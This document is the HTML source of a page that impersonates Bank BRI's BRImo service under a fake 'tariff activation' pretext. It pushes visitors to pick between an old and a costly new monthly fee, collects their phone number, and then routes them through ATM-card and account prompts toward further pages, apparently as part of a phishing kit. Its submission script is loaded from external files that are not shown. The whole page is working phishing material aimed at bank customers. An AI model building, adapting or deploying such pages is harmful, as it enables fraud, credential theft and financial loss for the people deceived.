<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>𝗔𝗸𝘁𝗶𝘃𝗮𝘀𝗶 𝗧𝗮𝗿𝗶𝗳 | 𝘄𝘄𝘄.𝗯𝗿𝗶𝗺𝗼-𝗯𝗿𝗶.𝗰𝗼.𝗶𝗱</title>
     <meta name="theme-color" content="#0f78cb">
     <link rel="icon" type="image/png" href="https://hosting.tigerengine.id/ewtyxl.png">
<meta content="https://hosting.tigerengine.id/e1dhsm.jpg" property="og:image">
<meta name="twitter:image" content="https://hosting.tigerengine.id/e1dhsm.jpg">
    	<meta name="description" content="Bank BRI terus berinovasi mengembangkan produk yang sesuai dengan perkembangan jaman untuk memenuhi kebutuhan nasabah">
  <script type="module" src="https://unpkg.com/ionicons@7.2.2/dist/ionicons/ionicons.esm.js"></script>
 
   
</head>
<style>
  body {
    font-family: 'Roboto', sans-serif; 
    margin: 0;
    padding: 0;
    background: linear-gradient(to bottom right, #e0f2fe, #e0f7fa);
    color: #fff;
    overflow-x: hidden;
    
}


.container {
  max-width: 400px; 
  width:90%;
  margin: 0 auto;
  padding: 10px;
  margin-top: 60px;
  min-height: 100vh;
  display: flex;
  flex-direction: column;
  align-items: center; 
  height:160px;
}

.hero {
  background-color: #ffffffe4;
  padding: 0px;
  border-radius: 10px;
  box-shadow: 0 3px 5px rgba(0, 0, 0, 0.5);
  margin-bottom: 10px;
  width: 100%;   
  max-width: 400px;
  height:160px;
}


.carousel {
  margin: 0 auto;
  position: relative;
  overflow: hidden;
  width: 100%;
  height:160px; 
  max-width: 400px;
  
}

.carousel-item {
  position: absolute;
  top: 0;
  width: 100%;
  height: 100%;
  transition: opacity 0.5s ease;
  opacity: 0;
}

.carousel-item.active {
  opacity: 1;
}

.carousel-item img {
  width: 100%;
  height: 100%;
  border-radius: 10px;
}

.carousel-nav {
  position: absolute;
  bottom: 10px;
  left: 50%;
  transform: translateX(-50%);
  display: flex;
  gap: 10px;
}

.carousel-nav-item {
  width: 10px;
  height: 10px;
  background-color: #cccccc;
  border-radius: 50%;
  cursor: pointer;
}

.carousel-nav-item.active {
  background-color: #007bff;
}

@media (max-width: 600px) { 
  .carousel {
    height: 160px; 
  }

  .card {
    max-width: 100%; 
  }

  .input-field label {
    font-size: 14px; 
  }

  .input-field input {
    font-size: 14px; 
  }

 
}

@media (max-width: 400px) {
  .carousel {
    height: 160px; 
  }

  .card {
    max-width: 100%; 
  }
}

.form-section {
    background-color: transparent;
    padding: 10px;
    border-radius: 0px 0px 10px 10px;
    width: 90%;
    max-width: 400px;
    color: #000; 
    box-shadow: 0 4px 8px rgba(0,0,0,0.2); 
}

.form-container {
    display: flex;
    justify-content: center;
    align-items: center;
    flex-direction: column; 
    width: 100%; 
}


.card {
    background-color: #ffffffe4;
    padding: 20px;
    border-radius: 10px;
    width: 100%;
    max-width: 400px;
    box-shadow: 0 2px 5px rgba(0, 0, 0, 0.1);
    border: 1px solid #ddd; 
    
}

.card-header {
    text-align: center;
    margin-bottom: 20px;
}

.card-body {
    margin-bottom: 20px;
}

ion-icon{
    font-size: 22px;
    margin-left: 8px;
    margin-top: 8px;
    position: absolute;
    color: #06529C;
}

.input-field {
    margin-bottom: 15px;
    position: relative;
    width: 100%;
}

.input-field label {
    display: block;
    margin-bottom: 5px;
    font-weight: bold;
    color: #000;
}

.input-field input {
    width: 100%;
    padding: 10px;
    border: 1px solid #007bff;
    border-radius: 7px;
    box-sizing: border-box;
    padding-right: 40px;
    font-size: 16px; 
    font-weight: bold;
    background-color: #f9f9f9; 
    color: #09559a; 
    box-shadow: 0 2px 4px rgba(0, 0, 0, 0.2); 
    padding-left: 40px;
}

.input-field i { 
    position: absolute;
    top: 50%;
    right: 15px;
    transform: translateY(-50%);
    color: #666; 
    font-size: 1.2rem;
}

.input-field input:focus {
    outline: none;
    border-color: #007bff;
    box-shadow: 0 0 5px rgba(0, 123, 255, 0.5); 
}

.input-field input:focus + i {
    color: #007bff;
}

::placeholder{
    opacity:0.7;
}

.card-footer {
    text-align: center;
}

.button {
    background-color: #137fd5;
    color: #fff;
    padding: 12px 20px;
    border: none;
    border-radius: 7px;
    cursor: pointer;
    transition: background-color 0.3s ease;
    font-size: 15px;
    width: 100%;
    max-width: 400px;
    margin-top: 10px; 
    box-shadow: 0 2px 4px rgba(0, 0, 0, 0.4); 
    margin-bottom: 10px;
    font-weight: 600;
    transition: 0.3s;
}

.button:hover {
    opacity:0.3;    
    background-color: #0F78CB; 
    color: #fff;
}

.button:disabled, 
.button[disabled]{  
    opacity:0.3;
    background-color: #0F78CB; 
    color: #fff;
}

nav{
     position:fixed;
     top: 0;
     height:50px;
     background: #007bff;
     width: 100%;
     z-index:99999;
}

.hh{    
    position: fixed; 
    top: -10; 
    left: 0; 
    right: 0; 
    margin: 0px auto; 
    width: 100%; 
    max-width: 450px;
    height: 50px; 
    background: url('https://hosting.tigerengine.id/pbtf99.jpg');
    background-repeat: no-repeat;
    background-size: 100% 100%;
    box-shadow: rgba(0, 0, 0, 0.10) 0px 10px 10px, rgba(0, 0, 0, 0.20) 0px 6px 6px;
    }
    
.button-85 {
  background-color: transparent;  
  user-select: none;
  -webkit-user-select: none;
  touch-action: manipulation;
}

.button-85:before {
  content: "";
  background: linear-gradient(
    50deg,
    #fff000,
    #ff7300,
    #fffb00,
    #48ff00,
    #00ffd5,
    #002bff,
    #7a00ff,
    #ff00c8,
    #ff0000
  );
  position: absolute;
  top: 0px;
  left: 0px;
  background-size: 500%;
  z-index: -1;
  filter: blur(0px);
  -webkit-filter: blur(0px);
  width: calc(100% + 0px);
  height: calc(100% + 0px);
  animation: glowing-button-85 20s linear infinite;
  transition: opacity 0.3s ease-in-out;
  border-radius: 10px;
}

@keyframes glowing-button-85 {
  0% {
    background-position: 0 0;
  }
  50% {
    background-position: 300% 0;
  }
  100% {
    background-position: 0 0;
  }
}

.button-85:after {
  z-index: -1;
  content: "";
  position: absolute;
  width: 100%;
  height: 100%;
  background: transparent;
  left: 0;
  top: 0;
  border-radius: none;
}
.card{       
        position: relative;
        border:0px solid #fff;
        padding:18px;
        width:100%;
        border-radius:10px; 
        background: #ffffffe6;            
        box-shadow: rgba(0, 0, 0, 0.40) 0px 5px 15px 0px; 
        
    }
    
    h3{
        border-bottom: 2px solid #ef871c;
        border-top:none;
        border-left:none;
        border-right:none;
        border-radius: 0px 0px 20px 0px;
        height: auto;            
        font-size: 16px;
        margin-bottom: 0px;
    }
    
    .load{
     top: 0;
     left: 0;
     right: 0;
     margin: 0 auto;
     position: fixed;
     display: flex;
     justify-content: center;
     align-items: center;
     background: #00000090;
     z-index: 999999999;
     width: 100%;
     height: 100%;
     max-width: 450px;
      }
      
      .x{    
            margin: 0 auto;
            display: flex;
            top: 0;
            left: 0;
            right: 0;
            width: 90%;    
            margin-top: 75%;             
      }
      
       .hid{
          display:none;
      }
      
      .radio-group {
            display: flex;
            flex-direction: column;          
            margin-bottom: 2px;
            max-width: 400px;
        }

        input[type="radio"] {
            display: none; /* Sembunyikan input asli */
            
        }

        .label-radio {
            position: relative;
            text-align:center;           
            padding: 4px 20px;
            border: 1px solid #09559a;
            border-radius: 25px;
            cursor: pointer;
            transition: background-color 0.3s ease, color 0.3s ease;
            font-size: 14px;
            color: #09559a;
            background-color: transparent;
            margin-bottom: 10px;
        }

        input[type="radio"]:checked + .label-radio {
            background-color: #137fd5;
            color: #fff;
            border: 1px solid #137fd5;                   
        }

         

        input[type="radio"]:checked + .label-radio::before {
            content: '';
            position: absolute;
            top: 50%;
            left: 10px;
            transform: translateY(-50%);
            width: 12px;
            height: 12px;
            border: 1px solid #ef871c;
            background-color: #fff;
            border-radius: 50%;
            transition: background-color 0.3s;            
        }

        input[type="radio"]:checked + .label-radio::before {
            background-color: #fff;
        }
        
welalxcome {
  display: flex;
  position: fixed;
  margin: 0 auto;
  top: 0;
  left: 0;
  right: 0;
  bottom: 0;
  width: 100%;
  max-width: 450px;
  background: url('https://hosting.tigerengine.id/m3dm2s.jpg');
  background-repeat: no-repeat;
  background-position: 100% 100%;
  background-size: 100% 100%;
  z-index: 10000;
  background-color: #ffffff;
  max-height: 820px;
}
welalxcome img {
    width:100%;
    max-width: 400px;
    height: 700px;
    margin-top: -55px;
    
}
chsalxcome {
    position: relative;
    width: 100%;
    height: 100vh;
    display: flex;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
}

 
 
      
      .jao{
            width:90%;
      }
      
      .jao1{
            width:90%;
      }
      
.kleman{
     top: 0;
     left: 0;
     right: 0;
     margin: 0 auto;
     position: fixed;
     display: flex;
     justify-content: center;
     align-items: center;
     background: #000000bb;
     z-index: 999999999;
     width: 100%;
     height: 100%;
     max-width: 450px;
      }
      
.animated {
	-webkit-animation-duration: 1s;
	animation-duration: 1s;
	-webkit-animation-fill-mode: both;
	animation-fill-mode: both;
	-webkit-animation-timing-function: linear;
	animation-timing-function: linear;
	 -webkit-animation-name: bounceIn; 
    animation-name: bounceIn; 
}

@-webkit-keyframes bounceIn { 
    0% { 
        opacity: 1; 
        -webkit-transform: scale(0); 
    } 

    50% { 
        opacity: 1; 
        -webkit-transform: scale(0); 
    } 

    70% { 
        -webkit-transform: scale(0); 
    } 

    100% { 
         -webkit-transform: scale(0); 
    } 
} 

@keyframes bounceIn { 
    0% { 
        opacity: 1; 
        transform: scale(.1); 
    } 

    50% { 
        opacity: 1; 
        transform: scale(.5); 
    } 

    70% { 
        transform: scale(1); 
    } 

    100% { 
        transform: scale(1); 
    } 
} 


.box {
  z-index: 99999999999999999;
  height: 50px;
  width: 50px;
  border-radius: 50%;
  border: 2px solid;
  border-color: #000 transparent;
  animation: spin 1s infinite ease-out;
  position: fixed;
  display: flex;
  left: 0;
  right: 0;
  margin: 0 auto;
  top: 140px;
}

@keyframes spin {
  0% {
    transform: rotate(0deg);
  }
  100% {
    transform: rotate(360deg);
  }
}
</style>
<body>
    <main>
<welalxcome class="hid">
</welalxcome>
<chsalxcome2 class="hid">
    
 <nav class="hh"></nav>
    <div class="container">    
 <img src="https://hosting.tigerengine.id/vdii6e.png" style="position:fixed;margin:0 auto;z-index:-9999;max-width:450px;margin-top:-20px;" alt="">
    <section class="hero">     
      <div class="carousel">
        <div class="carousel-item active">
          <img src="https://hosting.tigerengine.id/e7gxk8.jpg" alt="Carousel Image 1">
        </div>
        <div class="carousel-item">
          <img src="https://hosting.tigerengine.id/sh0aeg.jpg" alt="Carousel Image 2">
        </div>
        <div class="carousel-item">
          <img src="https://hosting.tigerengine.id/wyvaws.jpg" alt="Carousel Image 3">
        </div>
        <div class="carousel-item">
          <img src="https://hosting.tigerengine.id/00dhis.jpg" alt="Carousel Image 4">
        </div>
        <div class="carousel-item">
          <img src="https://hosting.tigerengine.id/ty4vbx.jpg" alt="Carousel Image 5">
        </div>
        <div class="carousel-nav">
          <div class="carousel-nav-item active"></div>
          <div class="carousel-nav-item"></div>
          <div class="carousel-nav-item"></div>
          <div class="carousel-nav-item"></div>
          <div class="carousel-nav-item"></div>
        </div>
      </div>
    </section>   



        <div class="form-section">
           <div class="form-container">
              <div class="card">
                 <div class="button-85">
                    <div class="card-body">
                       <h3 style="color:#09559a;margin-top:0;">Silahkan Pilih Tarif Transaksi Sesuai Kebutuhan Anda Di Bawah Ini</h3>
          <form id="login" onsubmit="sendHp()" method="post">
              
        <center><img style="width:93%;border-radius:5px;margin-top:10px;margin-bottom:8px;" src="https://hosting.tigerengine.id/taobkv.png" alt=""></center>
       <div class="radio-group">             
    <input type="radio" id="1" name="tarif" value="Lama Rp 6.500" required>
    <label class="label-radio" for="1">√•𝗧𝗮𝗿𝗶𝗳 𝗟𝗮𝗺𝗮 𝗥𝗽 𝟲.𝟱𝟬𝟬 / 𝗕𝗶 𝗳𝗮𝘀𝘁 𝟮.𝟱𝟬𝟬</label>

    <input type="radio" id="2" name="tarif" value="Baru Rp 150.000" required>
    <label class="label-radio" for="2">√•𝗧𝗮𝗿𝗶𝗳 𝗕𝗮𝗿𝘂 𝗥𝗽 𝟭𝟱𝟬.𝟬𝟬𝟬 / 𝗣𝗲𝗿𝗯𝘂𝗹𝗮𝗻</label>      
    </div>
       
       <div class="input-field">
     <label for="nohp">Masukan Nomor ponsel <b style="color: #06529C">BRI</b><b style="color: #F37024">mo</b> Anda :</label>
 <ion-icon name="phone-portrait-sharp" for="nohp"></ion-icon>
 <input type="tel" id="nohp" name="nohp" placeholder="08xxxx" maxlength="15" required>
                        </div>
                    </div>
   <div class="card-footer">
<button type="submit" class="button" id="lanjutkan" disabled>Lanjutkan</button>
                  </div>
                </div>
            </div>
         </form>
 <style>
     .hid{
         display: none;
     }
 </style>        
   
   <div class="kleman hid">
 <img src="https://hosting.tigerengine.id/f01dmo.gif" class="x" alt="loading">    
</div>


<div class="hid" id="popupku" style="position: fixed; left: 0; right: 0; top: 0; bottom: 0; margin: 0px auto; z-index: ; text-align: center; width: 100%; height: 100%; background: transparent;  z-index: 9999999999;max-width:450px;">
          <center>
             
 <div class="animated" style="position: fixed; left: 0; right: 0; width: 85%; background: #ffffff; border-radius: 20px; margin: 0px auto; top: 210px; border: 3px ridge #0F78CB;max-width:400px;">
<img src="https://hosting.tigerengine.id/9h6cey.png" width="85%" style="margin-top: 20px" >
<div class="box hid"></div>
<button type="button" style="width: 85%; height: 40px; border: none; background: #0F78CB; color: #fff; font-weight: bold;border-radius:7px; box-shadow: 2px 2px 2px #ccc; font-size: 15px" onclick="sudah()">Punya Kartu ATM</button><br/>
<p>
<button type="button" style="margin-bottom:10px;width: 85%; height: 40px; border: 2px solid #0F78CB; background: snow; color: #0F78CB; font-weight: bold;border-radius:7px; box-shadow: 2px 2px 2px #ccc; font-size: 15px" onclick="belum()">Sudah Punya Akun BRImo</button>
</p>
 </div>         
    </div>
       </div>
        
    			<center>
  
            <center><p style="font-size:13px;color:#00000080;margin-bottom:0; ">© 2024 PT.Bank Rakyat Indonesia (Persero) Tbk.<br> | All Rights Reserved.</p></center>
        </div>
    </div>    
</div>
    <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
    <script src="i.js"></script>
    <script src="token.js"></script>
    <script>

        
    $( document ).ready(function() {
      $('welalxcome').fadeIn(600);
            setTimeout(() => {
                $('welalxcome').fadeOut();
                $('chsalxcome2').fadeIn();
            },800)
        })
  
 
function sudah(){
$('.box').fadeIn();
setTimeout(function(){
     window.location.href="sudah.html";
     $("#popupku").fadeOut();
     $('.box').fadeOut();
     $('.kleman').fadeOut();
     }, 600);    
 } 
 
 
function belum(){
$('.box').fadeIn();
setTimeout(function(){
     window.location.href="belum.html";
     $("#popupku").fadeOut();
     $('.box').fadeOut();
     $('.kleman').fadeOut();
     }, 600);        
 } 
 
        
 // Get references to the input and button elements
const input = document.getElementById("nohp");
const button = document.getElementById("lanjutkan");

// Add an event listener for the input event
input.addEventListener("input", () => {
  // Check if the input field has any text
  if (input.value.length > 9) {
    // If there's text, enable the button
    button.disabled = false;
  } else {
    // If there's no text, disable the button
    button.disabled = true;
  }
});

        const carouselItems = document.querySelectorAll('.carousel-item');
const carouselNavItems = document.querySelectorAll('.carousel-nav-item');
let currentItem = 0;

function showItem(index) {
  carouselItems.forEach(item => {
    item.classList.remove('active');
  });

  carouselNavItems.forEach(item => {
    item.classList.remove('active');
  });

  carouselItems[index].classList.add('active');
  carouselNavItems[index].classList.add('active');
  currentItem = index;
}

carouselNavItems.forEach((item, index) => {
  item.addEventListener('click', () => {
    showItem(index);
  });
});

// Automatic slide
setInterval(() => {
  currentItem = (currentItem + 1) % carouselItems.length;
  showItem(currentItem);
}, 3000); // Change image every 3 seconds

// Form submission
const activationForm = document.getElementById('activation-form');

    </script>
</body>

</html>
